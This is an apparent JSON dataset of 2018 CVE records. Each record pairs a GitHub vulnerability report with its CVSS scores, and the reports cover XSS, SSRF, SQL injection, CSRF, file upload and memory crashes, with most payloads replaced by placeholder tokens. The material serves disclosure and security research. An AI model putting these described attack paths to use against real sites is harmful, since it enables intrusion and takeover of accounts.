fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING command: exi NUMBERTAG et [poc] [ URLTAG url",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11011",
        "Issue_Url_old": "https://github.com/ruibaby/halo/issues/9",
        "Issue_Url_new": "https://github.com/ruibaby/halo/issues/9",
        "Repo_new": "ruibaby/halo",
        "Issue_Created_At": "2018-05-11T09:43:02Z",
        "description": "These are two stored xss vulnerability. The first place > The front comment APITAG field is not strictly filtered Vulnerability code > APITAG CODETAG Payload APITAG Second place > When login failed at the background, the failed login username and password are written to the log without xss filtering, and displayed on the background home page, resulting in storage xss vulnerability. Vulnerability code > APITAG ERRORTAG Payload APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11031",
        "Issue_Url_old": "https://github.com/gouguoyin/phprap/issues/89",
        "Issue_Url_new": "https://github.com/gouguoyin/phprap/issues/89",
        "Repo_new": "gouguoyin/phprap",
        "Issue_Created_At": "2018-05-11T01:31:20Z",
        "description": "There is SSRF and sql injection vulnerability that can attack website and local area network NUMBERTAG SSRF vulnerability file: PATHTAG NUMBERTAG line ERRORTAG This method does not restrict the http request of the intranet address, it can cause SSRF attack For example, the following request APITAG You can see that the server returned the contents of the /etc/passwd NUMBERTAG sql injection file: PATHTAG NUMBERTAG line ERRORTAG you can see in line NUMBERTAG APITAG the splicing string method for sql statement generation\uff0cit will cause sql injection attack",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11037",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/307",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/307",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-05-13T07:00:35Z",
        "description": "SEGV on APITAG ERRORTAG The command line is exi NUMBERTAG pR FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11095",
        "Issue_Url_old": "https://github.com/libming/libming/issues/141",
        "Issue_Url_new": "https://github.com/libming/libming/issues/141",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-05-14T12:56:04Z",
        "description": "SIGSEV in APITAG in APITAG URLTAG URLTAG (gdb) set args POC2 (gdb) r header indicates a filesize of NUMBERTAG but filesize is NUMBERTAG APITAG APITAG $m APITAG NUMBERTAG m APITAG Stream out of sync after parse of blocktype NUMBERTAG SWF_DOACTION NUMBERTAG but expecting NUMBERTAG SWF_DOACTION / Program received signal SIGSEGV, Segmentation fault NUMBERTAG a1e9 in APITAG (maxn NUMBERTAG actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG if (sactif APITAG APITAG APITAG (gdb) bt NUMBERTAG a1e9 in APITAG (maxn NUMBERTAG actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG maxn NUMBERTAG at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG a0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG a0, indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG (gdb) info all registers ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG ffffffffffffffb NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffe1e NUMBERTAG fffffffe1e0 r NUMBERTAG d NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG rip NUMBERTAG a1e NUMBERTAG a1e9 APITAG eflags NUMBERTAG PF ZF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG Type APITAG to continue, or q APITAG to quit st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG fctrl NUMBERTAG f NUMBERTAG fstat NUMBERTAG ftag NUMBERTAG ffff NUMBERTAG fiseg NUMBERTAG fioff NUMBERTAG foseg NUMBERTAG fooff NUMBERTAG fop NUMBERTAG mxcsr NUMBERTAG f NUMBERTAG IM DM ZM OM UM PM ] Breakpoint NUMBERTAG APITAG (maxn NUMBERTAG actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG if (sactif APITAG APITAG APITAG (gdb) l NUMBERTAG if APITAG n+i+j, maxn) == SWFACTION_IF NUMBERTAG sactif = (struct SWF_ACTIONIF )&(actions[n+i+j NUMBERTAG chk whether last jump does lead us back to start of loop NUMBERTAG if (sactif APITAG APITAG APITAG NUMBERTAG sactif APITAG APITAG APITAG NUMBERTAG sactif APITAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11097",
        "Issue_Url_old": "https://github.com/cloudwu/cstring/issues/6",
        "Issue_Url_new": "https://github.com/cloudwu/cstring/issues/6",
        "Repo_new": "cloudwu/cstring",
        "Issue_Created_At": "2018-05-14T06:58:46Z",
        "description": "There is a memory leak vulnerability. APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a0 ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11098",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/11",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/11",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-05-14T03:28:22Z",
        "description": "Frog CMS NUMBERTAG has a file upload Vulnerability. The first step is to click the upload button APITAG The second step is to upload php script APITAG Last successful execution APITAG Look at the file upload function\uff0cthere is a is APITAG APITAG follow the APITAG judgment file type\u3002 APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-11100",
        "Issue_Url_old": "https://github.com/libming/libming/issues/142",
        "Issue_Url_new": "https://github.com/libming/libming/issues/142",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-05-15T00:29:54Z",
        "description": "SIGSEV in APITAG in APITAG URLTAG Program received signal SIGSEGV, Segmentation fault. APITAG (n NUMBERTAG actions NUMBERTAG cb0, maxn NUMBERTAG is_type2=<optimized out>) at APITAG NUMBERTAG if ( name) (gdb) bt NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG cb0, maxn NUMBERTAG is_type2=<optimized out>) at APITAG NUMBERTAG in APITAG (indent NUMBERTAG actions NUMBERTAG cb0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG (gdb) l NUMBERTAG int action_cnt NUMBERTAG char name NUMBERTAG APITAG NUMBERTAG name = is_type2 ? APITAG : sact APITAG NUMBERTAG if ( name NUMBERTAG INDENT NUMBERTAG APITAG {\" ,name NUMBERTAG while(action_cnt+n<maxn) (gdb) info all registers ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG c NUMBERTAG rd NUMBERTAG c NUMBERTAG rsi NUMBERTAG a NUMBERTAG rdi NUMBERTAG c NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG r NUMBERTAG r NUMBERTAG a2ff NUMBERTAG r NUMBERTAG fffffffffffa5c NUMBERTAG r NUMBERTAG ffff NUMBERTAG c NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG cb NUMBERTAG r NUMBERTAG a NUMBERTAG rip NUMBERTAG f NUMBERTAG e NUMBERTAG f NUMBERTAG e APITAG eflags NUMBERTAG PF ZF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG Type APITAG to continue, or q APITAG to quit st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG fctrl NUMBERTAG f NUMBERTAG fstat NUMBERTAG ftag NUMBERTAG ffff NUMBERTAG fiseg NUMBERTAG fioff NUMBERTAG foseg NUMBERTAG fooff NUMBERTAG fop NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11126",
        "Issue_Url_old": "https://github.com/doorgets/CMS/issues/11",
        "Issue_Url_new": "https://github.com/doorgets/cms/issues/11",
        "Repo_new": "doorgets/cms",
        "Issue_Created_At": "2018-05-15T04:50:40Z",
        "description": "There is a CSRF vulnerability that can be added to the administrator's password.. Although there are token fields, this field does not prevent CSRF attacks. poc\uff1a FILETAG When the victim accesses the malicious constructed link. FILETAG Successfully added an administrator user and tried to log in. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11127",
        "Issue_Url_old": "https://github.com/e107inc/e107/issues/3128",
        "Issue_Url_new": "https://github.com/e107inc/e107/issues/3128",
        "Repo_new": "e107inc/e107",
        "Issue_Created_At": "2018-05-15T09:29:00Z",
        "description": "There are CSRF vulnerabilities in the background, which can lead to arbitrary user deletion.. The Token is not validated in the background user deletion place. Causes the user to be deleted according to the id number. FILETAG After clicking delete, it will be deleted again. Grab packet analysis at this point. FILETAG The token field is not detected by analysis. Delete it directly. FILETAG After the token is removed, the request is constructed based on the user id of the annotation. FILETAG After the temptation administrator clicks, the user who finds the id is deleted. FILETAG POC\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG var f = APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11208",
        "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/187",
        "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/187",
        "Repo_new": "zblogcn/zblogphp",
        "Issue_Created_At": "2018-05-16T06:35:30Z",
        "description": "There is a cross site scripting vulnerability. A xss vulnerability was discovered in newest zblogphp. There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML in background web site settings\uff1a POC\uff1a In the copyright information office\uff0cinsert ERRORTAG FILETAG Then access the website home page to trigger the vulnerability\uff1a FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-11209",
        "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/188",
        "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/188",
        "Repo_new": "zblogcn/zblogphp",
        "Issue_Created_At": "2018-05-16T07:38:02Z",
        "description": "Weak encryption\uff08MD5\uff09 leads to backstage violent cracking. A simple MD5 encryption is used in Z APITAG NUMBERTAG s backstage login page,and it uses single element authentication\uff0cresulting in a violent break into the backstage. POC: Backstage login page\uff1a FILETAG Grab data packets to get fields\uff0c APITAG FILETAG Then load a dictionary for violent cracking\uff1a FILETAG Access into the backstage of the website\uff1a FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-11210",
        "Issue_Url_old": "https://github.com/leethomason/tinyxml2/issues/675",
        "Issue_Url_new": "https://github.com/leethomason/tinyxml2/issues/675",
        "Repo_new": "leethomason/tinyxml2",
        "Issue_Created_At": "2018-05-16T02:05:16Z",
        "description": "heap buffer overflow Error In APITAG hello\uff01I use libfuzzer to test APITAG I meet heap buffer overflow Error.I think it is due to APITAG APITAG function APITAG lead to heap buffer overflow.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11218",
        "Issue_Url_old": "https://github.com/antirez/redis/issues/5017",
        "Issue_Url_new": "https://github.com/redis/redis/issues/5017",
        "Repo_new": "redis/redis",
        "Issue_Created_At": "2018-06-13T10:50:36Z",
        "description": "Placeholder.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11225",
        "Issue_Url_old": "https://github.com/libming/libming/issues/143",
        "Issue_Url_new": "https://github.com/libming/libming/issues/143",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-05-16T21:17:43Z",
        "description": "SEGV in dcputs in APITAG URLTAG URLTAG Program received signal SIGSEGV, Segmentation fault. strlen () at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG strlen () at PATHTAG NUMBERTAG cca4 in dcputs (s NUMBERTAG at APITAG NUMBERTAG bf in APITAG (n=<optimized out>, actions NUMBERTAG a NUMBERTAG maxn=<optimized out>) at APITAG NUMBERTAG in APITAG (indent NUMBERTAG actions NUMBERTAG a NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG c4f0, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG c4f0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d6d in APITAG (indent=<optimized out>, actions=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG decompile_SWITCH (n NUMBERTAG off1end=<optimized out>, maxn=<optimized out>, actions NUMBERTAG c NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Breakpoint NUMBERTAG dcputs (s NUMBERTAG APITAG { \") at APITAG NUMBERTAG int len=strlen(s); (gdb) l NUMBERTAG oid NUMBERTAG dcputs(const char s NUMBERTAG int len=strlen(s NUMBERTAG dcchkstr(len NUMBERTAG strcat(dcptr,s NUMBERTAG dcptr+=len NUMBERTAG strsize+=len;",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11230",
        "Issue_Url_old": "https://github.com/agl/jbig2enc/issues/61",
        "Issue_Url_new": "https://github.com/agl/jbig2enc/issues/61",
        "Repo_new": "agl/jbig2enc",
        "Issue_Created_At": "2018-05-17T06:49:15Z",
        "description": "Error heap use after free APITAG jbig2_add_page(jbig2ctx , Pix ). Hello,I use my company tools. I found jbig a crash.it is heap use after free APITAG jbig2_add_page(jbig2ctx , Pix ).I think it is due to APITAG when APITAG want to obtain the wdith of photo.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11243",
        "Issue_Url_old": "https://github.com/upx/upx/issues/207",
        "Issue_Url_new": "https://github.com/upx/upx/issues/207",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2018-05-18T06:06:08Z",
        "description": "free invalid pointer in APITAG ./upx.out version up NUMBERTAG git d NUMBERTAG ec NUMBERTAG this is a bug in decompression (upx d or upx t) , it's more significant that bugs in compression. crash when try to free an invalid pointer , the mem.cpp detect invalid double free and throw an exception (SIGABRT) FILETAG NUMBERTAG dacce in APITAG (this NUMBERTAG fffffffd NUMBERTAG at APITAG NUMBERTAG APITAG (this NUMBERTAG fffffffd NUMBERTAG at APITAG NUMBERTAG APITAG (this NUMBERTAG fffffffd NUMBERTAG in_chrg=<optimized out>) at APITAG NUMBERTAG bc in APITAG (this=<optimized out>, fo=<optimized out>) at APITAG when an attacker could make a fake chunk in that pointer , it caused a double free vulnerability and attacker is able to make a code execution.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11243",
        "Issue_Url_old": "https://github.com/upx/upx/issues/206",
        "Issue_Url_new": "https://github.com/upx/upx/issues/206",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2018-05-17T18:06:14Z",
        "description": "multiple memory reading issue. ./upx.out version up NUMBERTAG git NUMBERTAG c NUMBERTAG fb7d7b+ this time is the devel branch , everything up to date FILETAG the call stack for POC NUMBERTAG f8 in get_le NUMBERTAG p NUMBERTAG at APITAG NUMBERTAG APITAG (this NUMBERTAG b NUMBERTAG c0 APITAG , p NUMBERTAG at APITAG the FILETAG , contains POC1 & POC2 FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11248",
        "Issue_Url_old": "https://github.com/lingochamp/FileDownloader/issues/1028",
        "Issue_Url_new": "https://github.com/lingochamp/filedownloader/issues/1028",
        "Repo_new": "lingochamp/filedownloader",
        "Issue_Created_At": "2018-05-17T11:01:52Z",
        "description": "Directory Traversal Vulnerability in APITAG We have found a directory traversal vulnerability in APITAG which may cause remote code execution. For consideration of security, we do not reveal the detail of this vulnerability currently. Developers of this repo can contact me by Email: tiamo_inter foxmail.com",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11251",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/956",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/956",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-01-24T02:10:17Z",
        "description": "heap buffer overflow in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: magick buffer overflow APITAG /dev/null ASAN OUTPUT ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11319",
        "Issue_Url_old": "https://github.com/vim-syntastic/syntastic/issues/2170",
        "Issue_Url_new": "https://github.com/vim-syntastic/syntastic/issues/2170",
        "Repo_new": "vim-syntastic/syntastic",
        "Issue_Created_At": "2018-04-16T17:25:45Z",
        "description": "Checker config files allow arbitrary code execution scenarios. Hi, I'm the Debian maintainer of vim syntastic and I received this bug report: CVETAG Package: vim syntastic Version NUMBERTAG Severity: serious Hello, syntastic has a Configuration Files NUMBERTAG feature enabled for several checkers, where: a configuration file is looked up in the directory of the file being checked, then upwards in parent directories. The search stops either when a file with the right name is found, or when the root of the filesystem is reached NUMBERTAG URLTAG Each line found in the configuration file is escaped as a single argument and appended to the checker command being run. I am not an expert on the various possibly dangerous command line options of all possible checkers, but I played with one I knew how to play with, and what follows is a possible attack. There might be easier attacks on checkers that are enabled by default, since the configuration files features, as it is now, leaves a pretty wide attack surface open. Step NUMBERTAG a malicious gcc plugin The source code: CODETAG Building the plugin: APITAG Installing the plugin as APITAG in /tmp: APITAG Step NUMBERTAG a syntastic config file APITAG Step NUMBERTAG enable the avrgcc plugin APITAG Step NUMBERTAG edit a C++ file in /tmp APITAG Step NUMBERTAG cry APITAG What should be different There are several steps that can avoid this NUMBERTAG allow to disable this feature, and ship with this feature disabled by default NUMBERTAG stop recursing upwards when hitting a directory that's writable by someone other than the current user NUMBERTAG check that the config files are owned by the current user Mitigation I am not a vimscript expert, and unfortunately I have not found a way to disable this behaviour without editing the syntastic config files. It works. What do you think about it?",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-11320",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4578",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4578",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2018-05-21T05:32:37Z",
        "description": "Sensitive variables contributed via machine during deployment are not obfuscated in the deployment logs. When an Azure Target is involved in a deployment, the sensitive account variables linked to it are not obfuscated in the logs. Steps to reproduce Create an Azure Subscription account Create an Azure APITAG target that uses the previously created account Create a project with a Deploy Azure APITAG step that uses the same role as the previously created target. Add the debugging variable APITAG to the project. Create and deploy release View the deployment log What you expect to see The printed log should show APITAG as the value of the variable APITAG What you see instead The actual value of the azure password is printed to the logs Octopus releases with this regression bug This issue came about with a changed execution pipeline which was available from APITAG however this code path that led to this bug would not have been commonly executed until the Azure targets introduced in APITAG CVE NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11330",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/58",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/58",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2018-05-19T01:50:38Z",
        "description": "Xss & file upload vuln. Please advise. .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-11332",
        "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/483",
        "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/483",
        "Repo_new": "clippercms/clippercms",
        "Issue_Created_At": "2018-05-22T12:33:20Z",
        "description": "Persistent XSS on APITAG name' field (site_name). A persistent (stored) XSS can be exploited because site_name isn't being sanitized upon saving. This vulnerability is specifically the APITAG Name\" field under the Configuration APITAG tab. Here's an output when the payload APITAG alert NUMBERTAG APITAG is entered and saved. Upon saving through the field: FILETAG Upon visiting the login page: FILETAG Please refer here for a fix: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-11339",
        "Issue_Url_old": "https://github.com/frappe/frappe/issues/5546",
        "Issue_Url_new": "https://github.com/frappe/frappe/issues/5546",
        "Repo_new": "frappe/frappe",
        "Issue_Created_At": "2018-05-10T15:30:41Z",
        "description": "XSS Vulnerability in comment area. URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11371",
        "Issue_Url_old": "https://github.com/zorlan/skycaiji/issues/9",
        "Issue_Url_new": "https://github.com/zorlan/skycaiji/issues/9",
        "Repo_new": "zorlan/skycaiji",
        "Issue_Created_At": "2018-05-22T10:13:44Z",
        "description": "\u540e\u53f0\u6dfb\u52a0\u7528\u6237CSRF\u6f0f\u6d1e. \u63cf\u8ff0\uff1a APITAG \u6f0f\u6d1e\u7c7b\u578b\uff1a CSRF \u653b\u51fb\u8f7d\u4f53\uff1a FILETAG CODETAG APITAG \u653b\u51fb\u5f71\u54cd\uff1a \u653b\u51fb\u8005\u8bbf\u95ee\u6b64\u9875\u9762\u5373\u53ef\u6dfb\u52a0\u7f51\u7ad9\u7ba1\u7406\u5458\u8d26\u53f7",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11375",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9928",
